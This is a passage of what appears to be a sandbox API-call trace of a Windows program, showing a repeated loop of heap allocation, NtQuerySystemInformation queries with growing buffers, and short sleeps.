(in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c900 | out: hHeap=0x2560000) returned 1 [0272.130] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0272.130] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0272.130] Sleep (dwMilliseconds=0x110) [0272.149] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d7c0 [0272.149] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d7c0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d7c0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0272.149] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d7c0 | out: hHeap=0x2560000) returned 1 [0272.149] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a880 [0272.149] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a880, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a880, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0272.150] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a880 | out: hHeap=0x2560000) returned 1 [0272.150] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c188 [0272.150] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c188, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c188, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0272.151] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c188 | out: hHeap=0x2560000) returned 1 [0272.151] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c5e0 [0272.151] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c5e0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c5e0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0272.151] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c5e0 | out: hHeap=0x2560000) returned 1 [0272.151] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0272.152] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0272.152] Sleep (dwMilliseconds=0x110) [0272.209] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d600 [0272.209] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d600, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d600, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0272.210] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d600 | out: hHeap=0x2560000) returned 1 [0272.210] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285abc0 [0272.210] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285abc0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285abc0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0272.210] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285abc0 | out: hHeap=0x2560000) returned 1 [0272.210] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bc30 [0272.210] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bc30, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bc30, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0272.211] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bc30 | out: hHeap=0x2560000) returned 1 [0272.211] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c9c8 [0272.211] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c9c8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c9c8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0272.212] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c9c8 | out: hHeap=0x2560000) returned 1 [0272.212] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0272.212] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0272.212] Sleep (dwMilliseconds=0x110) [0272.272] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d7c0 [0272.272] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d7c0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d7c0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0272.273] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d7c0 | out: hHeap=0x2560000) returned 1 [0272.273] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a8e8 [0272.273] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a8e8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a8e8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0272.273] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a8e8 | out: hHeap=0x2560000) returned 1 [0272.273] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bcc8 [0272.273] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bcc8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bcc8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0272.274] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bcc8 | out: hHeap=0x2560000) returned 1 [0272.274] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295ce78 [0272.274] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295ce78, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295ce78, ResultLength=0x19ee88*=0xc0) returned 0x0 [0272.275] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295ce78 | out: hHeap=0x2560000) returned 1 [0272.275] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0272.275] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0272.275] Sleep (dwMilliseconds=0x110) [0272.311] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d6a8 [0272.311] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d6a8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d6a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0272.313] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d6a8 | out: hHeap=0x2560000) returned 1 [0272.313] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a880 [0272.313] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a880, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a880, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0272.314] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a880 | out: hHeap=0x2560000) returned 1 [0272.314] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c350 [0272.314] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c350, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c350, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0272.314] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c350 | out: hHeap=0x2560000) returned 1 [0272.315] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cb58 [0272.315] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cb58, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cb58, ResultLength=0x19ee88*=0xc0) returned 0x0 [0272.315] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cb58 | out: hHeap=0x2560000) returned 1 [0272.315] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0272.316] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0272.316] Sleep (dwMilliseconds=0x110) [0272.348] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d750 [0272.348] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d750, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d750, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0272.349] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d750 | out: hHeap=0x2560000) returned 1 [0272.349] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a8e8 [0272.349] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a8e8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a8e8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0272.349] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a8e8 | out: hHeap=0x2560000) returned 1 [0272.349] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b640 [0272.349] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b640, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b640, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0272.350] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b640 | out: hHeap=0x2560000) returned 1 [0272.350] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c518 [0272.350] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c518, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c518, ResultLength=0x19ee88*=0xc0) returned 0x0 [0272.351] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c518 | out: hHeap=0x2560000) returned 1 [0272.351] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0272.351] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0272.351] Sleep (dwMilliseconds=0x110) [0272.359] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d600 [0272.359] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d600, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d600, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0272.360] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d600 | out: hHeap=0x2560000) returned 1 [0272.360] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a818 [0272.360] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a818, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a818, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0272.360] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a818 | out: hHeap=0x2560000) returned 1 [0272.360] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c058 [0272.361] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c058, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c058, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0272.361] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c058 | out: hHeap=0x2560000) returned 1 [0272.361] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cf40 [0272.361] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cf40, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cf40, ResultLength=0x19ee88*=0xc0) returned 0x0 [0272.362] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cf40 | out: hHeap=0x2560000) returned 1 [0272.362] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0272.362] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0272.362] Sleep (dwMilliseconds=0x110) [0272.372] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d7c0 [0272.372] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d7c0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d7c0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0272.373] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d7c0 | out: hHeap=0x2560000) returned 1 [0272.374] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285ab58 [0272.374] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285ab58, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285ab58, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0272.375] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285ab58 | out: hHeap=0x2560000) returned 1 [0272.375] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b510 [0272.375] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b510, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b510, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0272.376] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b510 | out: hHeap=0x2560000) returned 1 [0272.376] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cb58 [0272.376] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cb58, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cb58, ResultLength=0x19ee88*=0xc0) returned 0x0 [0272.376] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cb58 | out: hHeap=0x2560000) returned 1 [0272.376] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0272.377] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0272.377] Sleep (dwMilliseconds=0x110) [0272.679] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d558 [0272.679] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d558, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d558, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0272.680] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d558 | out: hHeap=0x2560000) returned 1 [0272.680] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a5a8 [0272.680] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a5a8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a5a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0272.681] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a5a8 | out: hHeap=0x2560000) returned 1 [0272.685] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bf28 [0272.685] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bf28, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bf28, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0272.686] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bf28 | out: hHeap=0x2560000) returned 1 [0272.686] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d198 [0272.686] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d198, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d198, ResultLength=0x19ee88*=0xc0) returned 0x0 [0272.686] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d198 | out: hHeap=0x2560000) returned 1 [0272.686] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0272.687] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0272.687] Sleep (dwMilliseconds=0x110) [0272.723] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d788 [0272.723] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d788, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d788, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0272.724] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d788 | out: hHeap=0x2560000) returned 1 [0272.724] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a4d8 [0272.724] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a4d8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a4d8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0272.724] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a4d8 | out: hHeap=0x2560000) returned 1 [0272.724] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c188 [0272.724] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c188, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c188, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0272.725] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c188 | out: hHeap=0x2560000) returned 1 [0272.725] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cc20 [0272.725] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cc20, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cc20, ResultLength=0x19ee88*=0xc0) returned 0x0 [0272.725] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cc20 | out: hHeap=0x2560000) returned 1 [0272.725] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0272.726] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0272.726] Sleep (dwMilliseconds=0x110) [0272.733] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d590 [0272.733] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d590, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d590, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0272.733] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d590 | out: hHeap=0x2560000) returned 1 [0272.733] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a610 [0272.733] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a610, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a610, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0272.734] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a610 | out: hHeap=0x2560000) returned 1 [0272.734] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c058 [0272.734] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c058, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c058, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0272.734] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c058 | out: hHeap=0x2560000) returned 1 [0272.734] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c518 [0272.734] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c518, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c518, ResultLength=0x19ee88*=0xc0) returned 0x0 [0272.735] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c518 | out: hHeap=0x2560000) returned 1 [0272.735] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0272.735] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0272.735] Sleep (dwMilliseconds=0x110) [0272.771] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d590 [0272.771] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d590, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d590, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0272.772] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d590 | out: hHeap=0x2560000) returned 1 [0272.772] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a8e8 [0272.772] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a8e8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a8e8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0272.773] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a8e8 | out: hHeap=0x2560000) returned 1 [0272.773] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c3e8 [0272.773] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c3e8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c3e8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0272.781] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c3e8 | out: hHeap=0x2560000) returned 1 [0272.781] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cb58 [0272.781] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cb58, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cb58, ResultLength=0x19ee88*=0xc0) returned 0x0 [0272.781] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cb58 | out: hHeap=0x2560000) returned 1 [0272.781] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0272.782] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0272.782] Sleep (dwMilliseconds=0x110) [0272.798] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d670 [0272.798] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d670, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d670, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0272.799] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d670 | out: hHeap=0x2560000) returned 1 [0272.799] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a748 [0272.799] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a748, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a748, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0272.799] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a748 | out: hHeap=0x2560000) returned 1 [0272.799] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bc30 [0272.799] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bc30, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bc30, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0272.800] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bc30 | out: hHeap=0x2560000) returned 1 [0272.800] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295ce78 [0272.800] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295ce78, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295ce78, ResultLength=0x19ee88*=0xc0) returned 0x0 [0272.800] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295ce78 | out: hHeap=0x2560000) returned 1 [0272.800] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0272.801] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0272.801] Sleep (dwMilliseconds=0x110) [0272.834] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d750 [0272.834] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d750, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d750, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0272.834] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d750 | out: hHeap=0x2560000) returned 1 [0272.834] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aa88 [0272.834] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aa88, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aa88, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0272.835] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aa88 | out: hHeap=0x2560000) returned 1 [0272.835] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b510 [0272.835] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b510, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b510, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0272.835] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b510 | out: hHeap=0x2560000) returned 1 [0272.838] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c9c8 [0272.838] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c9c8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c9c8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0272.839] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c9c8 | out: hHeap=0x2560000) returned 1 [0272.839] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0272.840] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0272.840] Sleep (dwMilliseconds=0x110) [0272.870] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d6e0 [0272.870] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d6e0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d6e0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0272.870] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d6e0 | out: hHeap=0x2560000) returned 1 [0272.870] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a9b8 [0272.870] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a9b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a9b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0272.871] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a9b8 | out: hHeap=0x2560000) returned 1 [0272.875] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c220 [0272.875] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c220, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c220, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0272.876] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c220 | out: hHeap=0x2560000) returned 1 [0272.876] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cce8 [0272.876] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cce8, Length=0xc0, 